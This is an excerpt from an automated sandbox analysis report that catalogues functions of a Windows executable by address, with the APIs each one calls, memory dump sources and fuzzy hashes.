                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X$`u#
                                                                                                    • API String ID: 779396738-1508474015
                                                                                                    • Opcode ID: 4b4114866a281d1efecb858488b197380564d22625484bc684c83233f0238f13
                                                                                                    • Instruction ID: 503a126ee487f418532ec782e2b9aa132a75afff0e544c075ddb94f3b4dc7d8e
                                                                                                    • Opcode Fuzzy Hash: 4b4114866a281d1efecb858488b197380564d22625484bc684c83233f0238f13
                                                                                                    • Instruction Fuzzy Hash: 7221D5B1A102489BCF15DF98C809BEE7BFDAF58304F008059E509E7241DBF45A899FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0019016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 001909F8
                                                                                                      • Part of subcall function 00193634: RaiseException.KERNEL32(?,?,?,00190A1A,?,00000000,?,?,?,?,?,?,00190A1A,00000000,00239758,00000000), ref: 00193694
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00190A15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 02d6d44d5031fa0bf21dab4d3217f88f4afcc24d0b3f7dd09945f9b3f159f9ee
                                                                                                    • Instruction ID: 924aabf8cf55f1b61bd709088bf389a09347d3708aeb76a0e6a940b35ffed6d3
                                                                                                    • Opcode Fuzzy Hash: 02d6d44d5031fa0bf21dab4d3217f88f4afcc24d0b3f7dd09945f9b3f159f9ee
                                                                                                    • Instruction Fuzzy Hash: 3EF0F67490030DBBCF06BAB8EC4699EB7AC5E19314B604130B928924E3EB70EF96C5C0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F88B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001F8C52
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 001F8C59
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 001F8E3A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 146820519-0
                                                                                                    • Opcode ID: 7956376d858d353ea715dc1928c0c5520a014c2c62bdf1e9c1891372c6e2c852
                                                                                                    • Instruction ID: c90fd80792726f620d2af3604a8961bd61c9e7b29c136ee7e390aaefde947ef6
                                                                                                    • Opcode Fuzzy Hash: 7956376d858d353ea715dc1928c0c5520a014c2c62bdf1e9c1891372c6e2c852
                                                                                                    • Instruction Fuzzy Hash: E5127C71A083449FC714DF28C484B6ABBE5FF98318F14895DE9898B292DB30ED45CF92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001F99F5 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_strcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 306214811-0
                                                                                                    • Opcode ID: 6750d31232a6a6b9d89c1647aa50e4114f8046847a7805262dd378b761c7adb8
                                                                                                    • Instruction ID: a89e47276fe98e4f4ad0a77f854fed4d5b807246db34234502c006cf634e0ec5
                                                                                                    • Opcode Fuzzy Hash: 6750d31232a6a6b9d89c1647aa50e4114f8046847a7805262dd378b761c7adb8
                                                                                                    • Instruction Fuzzy Hash: D8A14C31604609DFCB18EF58C5D1A69B7B1FF55318B1084ADE94A8F792DB32ED42CB80
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00176BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00176CA1
                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00176CB1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 64dc3285a5bf6dfaef2e33c7417e0b9c9bb36219f74d7b13ab39ba623eba8b95
                                                                                                    • Instruction ID: 798347c3ac7fd27077b968dc7adcd8e656f277d3d270a79b491f88457b31a44b
                                                                                                    • Opcode Fuzzy Hash: 64dc3285a5bf6dfaef2e33c7417e0b9c9bb36219f74d7b13ab39ba623eba8b95
                                                                                                    • Instruction Fuzzy Hash: 81315B71A00A0AFFDB19CF68C980B99B7B5FB04314F14C629E919A7244D7B1FE94DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0018FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00175F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00176049
                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0018FD44
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0018FD53
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001CFDD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                    • String ID:
                                                                                                    • API String ID: 3500052701-0
                                                                                                    • Opcode ID: 25ed902f32c1b327927a15932ee17e495fcf827cce5a60430a8a49d24ab8e522
                                                                                                    • Instruction ID: 167298baefee3b139a49b88528de5d8c8ad0fc75cd3ebfc9a91e9d486bedd368
                                                                                                    • Opcode Fuzzy Hash: 25ed902f32c1b327927a15932ee17e495fcf827cce5a60430a8a49d24ab8e522
                                                                                                    • Instruction Fuzzy Hash: 8D31D774904344AFEB32CF648889BE6BBED9F26708F0004AEE6DE57241C7745A86CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A8A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,001A895C,?,00239CE8,0000000C), ref: 001A8A94
                                                                                                    • GetLastError.KERNEL32(?,001A895C,?,00239CE8,0000000C), ref: 001A8A9E
                                                                                                    • __dosmaperr.LIBCMT ref: 001A8AC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 490808831-0
                                                                                                    • Opcode ID: 7173f88615bc56e7e02717198201407e5387a1ab3de516506ad4581a85fe0d68
                                                                                                    • Instruction ID: 4f1387f4c7068dd8c5deef923be06f887a51fc9fe4f308ace630faaf9f0dbd93
                                                                                                    • Opcode Fuzzy Hash: 7173f88615bc56e7e02717198201407e5387a1ab3de516506ad4581a85fe0d68
                                                                                                    • Instruction Fuzzy Hash: BF016F3B60526057D7142374688577E77464B93738F2A021AF80CDB0D2DF608CC58250
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,001A97CA,FF8BC369,00000000,00000002,00000000), ref: 001A9754
                                                                                                    • GetLastError.KERNEL32(?,001A97CA,FF8BC369,00000000,00000002,00000000,?,001A5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00196F61), ref: 001A975E
                                                                                                    • __dosmaperr.LIBCMT ref: 001A9765
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    • Opcode ID: 140cb4f9fa04cf2e50406da3974d9a9521fc036732c60d6c101250c26f920f8f
                                                                                                    • Instruction ID: 064e35b627c92598a185b6f10ff0d4301a7b3c51de0667fb75b47b9e8a03be56
                                                                                                    • Opcode Fuzzy Hash: 140cb4f9fa04cf2e50406da3974d9a9521fc036732c60d6c101250c26f920f8f
                                                                                                    • Instruction Fuzzy Hash: F1014C3A620214ABCF059FE9EC45C6E7B2ADBC6330B240249F814DB191EB70DD81CFA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001AD1E0 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 001AD1E4
                                                                                                    • _free.LIBCMT ref: 001AD21D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AD224
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2716640707-0
                                                                                                    • Opcode ID: 4141b287abf37d31bc49480a7184cd29fb5e13116218e7f100a6542f24019c39
                                                                                                    • Instruction ID: ab9b2a8cb89bfc11f7da975cc87979dde5386419740970cebd019d10b9439dfa
                                                                                                    • Opcode Fuzzy Hash: 4141b287abf37d31bc49480a7184cd29fb5e13116218e7f100a6542f24019c39
                                                                                                    • Instruction Fuzzy Hash: FCE0ED3B541A212AD22223397C8DA6F2A2CEFD37A0B260166F40982582EF208D0280F1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TranslateMessage.USER32(?), ref: 0017F22B
                                                                                                    • DispatchMessageW.USER32(?), ref: 0017F239
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017F24F
                                                                                                    • Sleep.KERNELBASE(0000000A), ref: 0017F261
                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 001C327C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 3288985973-0
                                                                                                    • Opcode ID: 31d3ac16f1b7761ef42fb9ed164f32d6fd3bf4f946b52477356b7c7fe556f542
                                                                                                    • Instruction ID: 914acd1a3963d2dff360d3e2ae98845642ac8295f5388ec228c98a29db2eca3e
                                                                                                    • Opcode Fuzzy Hash: 31d3ac16f1b7761ef42fb9ed164f32d6fd3bf4f946b52477356b7c7fe556f542
                                                                                                    • Instruction Fuzzy Hash: 1EF03A305053419AEA348BA09C49F9AB3ADEB94300F408928F619830D0DB3095488B21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00182AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00182FB6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    • Opcode ID: 8470a34b4feb4de0f2f202d80ab54ecb59af7674a7c59a6f60efaf65fdef61d4
                                                                                                    • Instruction ID: a7b0ac0f7d49d8b75500fc13aae6ba02c70e115dee326841e2d74d24b00eb058
                                                                                                    • Opcode Fuzzy Hash: 8470a34b4feb4de0f2f202d80ab54ecb59af7674a7c59a6f60efaf65fdef61d4
                                                                                                    • Instruction Fuzzy Hash: AA228B706082419FC715EF14C484B2ABBF1BFA9314F25895DF89A8B3A2D771EA41CF52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00181940 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 52254354233bbb404ca8b5d6f7704f2e1daa6224225ba5af8b205ce6584fd908
                                                                                                    • Instruction ID: 0de06b6c9d36e33691fadbf5f7d2a7345d384cf34be5f3a760a3616a4755944f
                                                                                                    • Opcode Fuzzy Hash: 52254354233bbb404ca8b5d6f7704f2e1daa6224225ba5af8b205ce6584fd908
                                                                                                    • Instruction Fuzzy Hash: 3C32CD71A00205AFDB24EF54C881FAEB7B9EF24314F148529E856AB2A1D731EE45CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001741E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001733E9,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00174227
                                                                                                      • Part of subcall function 001784B7: _wcslen.LIBCMT ref: 001784CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FullNamePath_wcslen
                                                                                                    • String ID: $$
                                                                                                    • API String ID: 4019309064-702190059
                                                                                                    • Opcode ID: 316ee1aac97f1a85b1e1c508264a9a937cc9db6243c67ebc7f8b7b14875127e2
                                                                                                    • Instruction ID: c7ca6bf6617566fe5c4ed8629559ee6d00f0d289f56ef150e4ad4a29e5fc44d3
                                                                                                    • Opcode Fuzzy Hash: 316ee1aac97f1a85b1e1c508264a9a937cc9db6243c67ebc7f8b7b14875127e2
                                                                                                    • Instruction Fuzzy Hash: 1711A135610208DBCB05EBA4A805EDD77FCAF18350B0180A5F949D3292DFB0E7988B11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001E9665
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001E9673
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3876400906-0
                                                                                                    • Opcode ID: 54c2287d89501b7409fb3ce8f28c0d78784f7b8bd4887b708b61926e31f8e5b9
                                                                                                    • Instruction ID: 958faf1a154dd47dc429672880fc5d17eb8985983b63522a7672f80d61712968
                                                                                                    • Opcode Fuzzy Hash: 54c2287d89501b7409fb3ce8f28c0d78784f7b8bd4887b708b61926e31f8e5b9
                                                                                                    • Instruction Fuzzy Hash: BF111979600A259FCB10EB65C884D6EB7F5FF58364B058848EC5AAB361DB30FD01CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00176E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 00176E80
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00173B33,?,00008000), ref: 001B59A2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: c2be786023fb5d195baad1e6e9101eea026c428341c2104bfa9e3fcfec014039
                                                                                                    • Instruction ID: 4179e83ac0c6bfb779b1c3f6a4673f1d3c453901bd1b47670b189b1040f78534
                                                                                                    • Opcode Fuzzy Hash: c2be786023fb5d195baad1e6e9101eea026c428341c2104bfa9e3fcfec014039
                                                                                                    • Instruction Fuzzy Hash: 17014031285625B6E3344A66CC0EF977FA8EF067B4F15C210FE9D6A1E0CBB45855CB90
                                                                                                    Uniqueness

